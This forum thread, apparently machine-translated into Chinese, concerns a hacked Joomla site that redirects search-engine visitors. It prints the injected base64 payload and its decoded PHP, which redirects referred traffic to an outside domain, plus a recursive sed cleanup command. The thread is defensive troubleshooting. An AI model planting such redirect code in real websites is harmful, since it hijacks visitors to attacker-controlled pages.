今天雖然給我的網站支票,只是發現了這個問題。我的網站谷歌搜索鏈接被重定向到一些未知的網站
以下是問題的詳細信息:
當我谷歌自己的網站,它會出現在谷歌結果頁面一如既往。
但是,當我點擊搜索結果鏈接到我的網站上,這需要一些時間來重定向我,處理它重定向我一些隨機URL(在不同的域礦)之後。
而且它工作正常,如果我嘗試直接訪問,通過輸入地址,通過瀏覽器直接效果很好。
本網站運行的是Joomla版本1.5.20。
我已經搜索了這個問題,我分享了搜索網頁後得到的結果。
所有論壇都表示這是受黑客或病毒攻擊感染。
所有論壇說,唯一的解決辦法是重新安裝Joomla。
只有Joomla和WordPress的網站的影響。
這個威脅駐留在PHP代碼中的一些地方。
從模板的這種使用更新預防,附加等,在未來的。
這就是我所有的關於研究,現在有沒有人,誰知道如何解決這個無需重新安裝和提示,以防止這種情況在未來?
終於得到了問題整理出來,截稿前,下面是詳細信息:
首先什麼威脅是:
它是一種簡單的Base64編碼的PHP腳本,我在我的網站的所有文件中找到這裏是它的外觀:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGluaWEuenlucy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));
這是base64編碼代碼現在這裏是它要運行PHP的實際代碼,解碼這個字符串後:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://hinia.zyns.com/");
exit();
}
}
}
}
}
正如你可以在代碼中看到的那樣,這將只針對搜索引擎,所以現在清楚這是威脅。
現在任何猜測這是多少時間重複,通過我的網站???
你不會相信,其約10,000次重複,我得到它在每一個地方,無論是模塊,插件,管理員,圖書館等排序每一個單一的文件。
因此,爲了讓我的網站再次工作,我不得不刪除每一行,我做了同樣的事情,因爲它可以檢查網站再次運行良好。
嘗試禁用插件,這裏是一個教程: http://www.ostraining.com/blog/joomla/disable-a-joomla-plugin/ ,如果將作品中,您將能夠識別哪些插件被感染。
這是一個好主意,但是,如果每個單個文件都受到感染,我得到了這種情況,我發佈了我的答案,我如何得到它,與您寶貴的迴應! –
這是一些CMS提出的常見問題。這是一個解決你的問題100%的腳本。
find . \(-name "*.php" \) -exec grep -Hn "[\t]*eval(base64_decode(.*));" {} \; -exec sed -i 's/[\t]*eval(base64_decode(.*));//g' {} \;
你必須在控制檯中運行它。
也許你的一個插件被感染,試圖卸載它們 –
可能是這個問題,但我不想做任何大的改變,有時候這會變得很不方便。 –
在WordPress中有禁用插件的功能,稍後可以再次啓用。也許同樣的功能在Joomla? –